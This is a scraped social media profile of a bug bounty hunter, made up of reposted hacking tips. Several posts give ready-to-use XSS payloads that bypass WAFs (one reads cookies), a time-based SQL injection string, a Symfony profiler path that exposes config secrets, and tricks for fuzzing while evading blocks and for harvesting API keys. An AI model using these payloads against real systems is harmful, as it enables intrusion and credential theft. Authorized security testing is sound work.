@Pax_Hiro Profile picture

Praveen Kumar

@Pax_Hiro

Bug Hunter ⚡

Similar User
Rahmat Qurishi photo

@RahmatQurishi

Jefferson Gonzales photo

@gonzxph

Sirat Sami (analyz3r) photo

@siratsami71

Basavaraj Banakar🇮🇳 photo

@basu_banakar

JustinBmz photo

@Justin85563950

Saajan Bhujel ❄ photo

@saajanbhujel

S.M Munna photo

@munna0x1

0xm1racle photo

@0xm1racle

zax photo

@itsz4x

Arjun Singh photo

@ArjunSingh27586

Proviesec photo

@proviesec

Blacksolo , Sp00f3dByt3 photo

@MBlacksolo

Manik Koirala photo

@ak_bruster

tharun photo

@tharunsai0039

YADA photo

@Rmyada1

Praveen Kumar Reposted

*XSS* "></ : [filtered] <img> <iframe>tags : [filtered] &quot;&lt;&gt; : [filtered] HTML entity: &#x3C;a href=javascript:alert(1)&#x3E;click : filtered (javascript:alert) : [filtered] Final payload: "aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click" 🫡🧙‍♂️ #bugbounty #xss


Praveen Kumar Reposted

Bypassed strong Akamai WAF of Usa Department of Justice payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

Tweet Image 1

Praveen Kumar Reposted

If you find Web frameworks like Symfony, add '/app_dev.php/_profiler/open?file=app/config/parameters.yml' to the wordlist, and you may get juicy data. Enjoy!" #bugbountytips #bugbountytip #cybersecurity #ethicalhacking

Tweet Image 1

Praveen Kumar Reposted

Two P3 after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. Payload: ⚙️ "%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e" credit: @nav1n0x #bugbountytips #BugBounty

Tweet Image 1
Tweet Image 2
Tweet Image 3

Praveen Kumar Reposted

Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite medium.com/@h4x0r_dz/2300… credit: @h4x0r_dz #bugbountytips #bugbounty


Praveen Kumar Reposted

Acqhunt: An acquisition grabber in bug bounty hunting. Developed in Golang, it optimizes and elevates your bug hunting journey

Tweet Image 1

Praveen Kumar Reposted

The writeup is ready 📝 (Subdomain Fuzzing worth 35k bounty!) 💰 I tried my best to make everything clear, and useful ✨ Enjoy 😊 credit: @XHackerx007 #bugbountytips #Hacking medium.com/@HX007/subdoma…


Praveen Kumar Reposted

Sql Injection Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #bugbountytips #BugBounty #SqlInjection

Tweet Image 1

Praveen Kumar Reposted

I just published 0 Click Account TakeOver + Steal MFA Token and party! link.medium.com/jf4tCk9DiJb


Praveen Kumar Reposted

I got a bounty too #bugbountytips

Don't forget to add Release.zip to your wordlist, you can't imagine what can happen. #BugBounty #SensitiveDataExposure

Tweet Image 1


Praveen Kumar Reposted

The Complete Ethical Hacking Course Beginner to Advanced... "🔐 Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced'! 🚀 Uncover the secrets of cybersecurity, master penetration testing, and become a pro ethical hacker. 💻🛡️ Join the cybersecurity…

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Praveen Kumar Reposted

🤔Many people have often asked me how to search for "ivanti", for shodan you can search as title:"Ivanti Connect" hostname:"target.*" credit: @ynsmroztas #bugbountytip #bugbounty

Tweet Image 1

Praveen Kumar Reposted

Tips for JS file enum for endpoints /Juicy info ... ** - download js files of the target Ex : wget link_to_js ** - use beautifier.io to easy read js file contents ** - i got extra endpoints to check for :) #bugbountytips

Tweet Image 1

Praveen Kumar Reposted

Finally i fixed the problem, Solution: i need to fuzz with user agent they block ffuf UA ffuf -u https://test/.com/FUZZ -w wordlist .txt -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Guys why when i fuzz some websites they don’t give me any results but I’m sure they should give me results for some paths I already see it, there’s no waf in Application what should i do & why this happened?



Praveen Kumar Reposted

RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass buff.ly/4b1S5u0 Such a great read by: @pmnh_ & @UsmanMansha420 #bugbounty #hacking #cybersecurity #bugbountytips

Tweet Image 1
Tweet Image 2

Praveen Kumar Reposted

i uploaded the template to a github repo and will upload other templates when i create new ones github.com/rzizah/private…


Praveen Kumar Reposted

Google Dork - Login Pages 🔑 inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels 👀

Tweet Image 1

Praveen Kumar Reposted

10 bsqli in 15 mins ⏳ and nearly 2 hour to dumb data and confirm 1- i set upped my bsqli payload using nuclei 2- used custom google dorks for params found success with it on the same program 3- gathered all links and run my tempelate on them 4- dumbed the data using ghauri

Tweet Image 1

Praveen Kumar Reposted

Easy information disclosure 1- chose wide scope target 2- gather root domains 3- use gau or waymore > you can use --subs to also get subs 4- filter js files and search for api_keys you can use mantra or nuclei exposure temp #BugBounty #bugbountytips

Tweet Image 1

Loading...

Something went wrong.


Something went wrong.